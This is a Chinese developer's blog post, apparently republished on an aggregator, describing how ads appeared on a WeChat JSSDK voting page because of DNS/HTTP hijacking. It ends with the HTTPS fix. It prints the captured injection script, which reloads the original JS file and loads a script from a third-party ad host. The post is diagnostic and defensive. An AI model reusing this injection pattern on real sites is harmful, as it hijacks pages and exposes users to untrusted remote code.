dns劫持!导致微信jssdk上挂广告
来源:互联网 发布:windows企业版怎么下载 编辑:程序博客网 时间:2024/05/16 09:27
这几天在做一个微信的投票网页,用的是vue+quasar UI框架,结果这几天发现偶尔上网页后有广告,如下图红色方框
以为自己的虚拟主机被攻击,但反复检查了都感觉没啥问题,然后怀疑是不是quasar这个框架有问题,因为我第一次用这个UI框架,是外国的,看着很正规的,也是反复查了,也没发现什么问题,也不是一直会出现,偶尔才出现一次,我就一直刷新,我先是截了正常时的网络访问状况
不知刷新了多久,终于刷出了广告,看!果然有问题了,jwexin-1.2.0.js这个是微信网页jssdk的文件,可这个为啥下面又重新加载了还带上了参数
我点了第一个jsweixin-1.2.0.js,果然发现了问题了,这就是生成广告的脚本
这是广告js的代码
var _atn_obj_ = new Object; _atn_obj_.oldurl = 'http://res.wx.qq.com/open/js/jweixin-1.2.0.js?cHVzaA=1513177208'; _atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7My4PMz8jMzcjKzcrHoMrNzc3Lg7bfxtHO0dLOg82Dy8vPys/Pg86DzsrOzM7IyM3Px4POys7MzsjIzc/Hz8vLzs7IzYPKzcrJyw=='; window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
我将微信jssdk引用方式改成https,好像有点效果
<script type='text/javascript' src='https://res.wx.qq.com/open/js/jweixin-1.2.0.js'></script>
阅读全文
0 0
- dns劫持!导致微信jssdk上挂广告
- 广告作弊:DNS劫持和HTTP劫持
- 微信 JSSDK
- 微信JSSDK-demo
- 微信JSSDK使用指南
- 微信:JSSDK开发
- 微信jssdk总结
- 微信jssdk开发
- 微信 JSSDK 调用
- 微信JSSDK生成
- 微信jssdk使用
- 微信jssdk封装
- 微信jssdk接口
- dnsmasq反DNS劫持、DNS污染、去广告
- 微信企业号 jsSDK wx.config报invalid signature错误,导致api接口无法使用
- 导致微信JSSDK 自定义分享内容接口失效的一种原因
- 微信 JSSDK .NET版
- 微信分享jssdk实例
- (扩展)欧几里得
- JAVA开发Web Service几种框架介绍
- angular2_引入第三方文件之jQuery的引入
- 11.springboot整合默认spring cache
- CSS 终极之战:Grid VS Flexbox
- dns劫持!导致微信jssdk上挂广告
- 《文法俱乐部》读书笔记之辅语和基本句型--LG二进制
- 设计模式笔记——策略模式
- Android中的消息处理实例与分析
- 洛谷P2387 魔法森林_spfa
- Intellij IDEA使用(七)—— 使用Intellij IDEA配置Java(JavaWeb)项目jar包的两种方式
- SQL SERVER 中的行列转换小结
- c++ 中的特殊判断
- [Linux驱动炼成记]01-用户空间操作iic